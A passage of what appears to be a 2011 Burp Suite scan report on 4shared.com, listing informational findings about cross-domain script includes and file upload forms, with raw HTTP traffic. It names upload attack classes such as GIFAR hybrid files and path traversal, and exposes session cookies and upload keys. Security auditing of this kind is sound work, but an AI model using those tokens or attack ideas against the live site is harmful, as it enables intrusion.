The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /enterprise/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/premium.jsp?ref=header
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23755
Date: Fri, 29 Jul 2011 13:59:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Enterprise</title
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.5. http://www.4shared.com/icons/16x16/doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /icons/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:25 GMT
Content-Length: 38530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.6. http://www.4shared.com/icons/16x16/pdf.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:25 GMT
Content-Length: 38524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.7. http://www.4shared.com/icons/16x16/png.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /icons/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:00 GMT
Content-Length: 38691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.8. http://www.4shared.com/images/asf-logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.9. http://www.4shared.com/images/tomcat.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AE600031E51DE28C97F64F946EE76F5.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.10. http://www.4shared.com/images/void.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 404 /images/void.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=38495591D688E5F4D8D920445CB59833.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:41 GMT
Content-Length: 38652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.11. http://www.4shared.com/js/'%20+%20img%20+%20' previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:51 GMT
Content-Length: 38685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.12. http://www.4shared.com/js/'%20+%20val%20+%20' previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:10:51 GMT
Content-Length: 38680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.13. http://www.4shared.com/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/login.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: fp=4sess_p50722b1a_t20110729-145755_; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 27078
Date: Fri, 29 Jul 2011 13:57:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login</title>
<met
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.14. http://www.4shared.com/m/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://edge.quantserve.com/quant.js
http://platform.twitter.com/widgets.js
http://www.statcounter.com/counter/counter.js

Request

GET /m/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 28005
Date: Fri, 29 Jul 2011 14:01:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared for Symbian</title>
<meta http-equiv="Content-Ty
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.15. http://www.4shared.com/m/iphone.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/iphone.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://edge.quantserve.com/quant.js
http://platform.twitter.com/widgets.js
http://www.statcounter.com/counter/counter.js

Request

GET /m/iphone.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/m/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23384
Date: Fri, 29 Jul 2011 14:07:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared for iPhone and iPad</title>
<meta http-equiv="Co
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div style="padding-top:2px;"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div style="padding-top:2px;"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.16. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

11.17. http://www.4shared.com/remindPassword.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/remindPassword.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /remindPassword.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 21381
Date: Fri, 29 Jul 2011 13:57:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - online file sharing and storage - Password reminder</tit
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.18. http://www.4shared.com/requestCall.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/requestCall.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6Lc-TgwAAAAAALAAwEdL3ahmchYPnZI0XvSimWGm
http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /requestCall.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 22978
Date: Fri, 29 Jul 2011 13:59:28 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<title>4shared.com - free file sh
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lc-TgwAAAAAALAAwEdL3ahmchYPnZI0XvSimWGm"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.19. http://www.4shared.com/signup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

11.20. http://www.4shared.com/sla.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/sla.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 24527
Date: Fri, 29 Jul 2011 14:08:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Service Lev
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12. File upload functionality previous next
There are 9 instances of this issue:

/
/icons/16x16/doc.gif
/icons/16x16/pdf.gif
/icons/16x16/png.gif
/images/asf-logo.gif
/images/tomcat.gif
/images/void.gif
/js/'%20+%20img%20+%20'
/js/'%20+%20val%20+%20'

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

12.1. http://www.4shared.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc372.4shared.com/main/upload.jsp?sId=7ZSWRWr2OtMkYTBt&fau=1&ausk=7ZSWRWr2OtMkYTBt

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.2. http://www.4shared.com/icons/16x16/doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/doc.gif

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc348.4shared.com/main/upload.jsp?sId=IL8DG8hOz6wfTXvF&fau=1&ausk=IL8DG8hOz6wfTXvF

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 404 /icons/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:25 GMT
Content-Length: 38530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
</div>
<input type="file" id="fid0" name="fff0" size="10" class="file"/>
</div>
...[SNIP]...

12.3. http://www.4shared.com/icons/16x16/pdf.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://dc217.4shared.com/main/upload.jsp?sId=nb1xZBPhEBb3JR3i&fau=1&ausk=nb1xZBPhEBb3JR3i

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
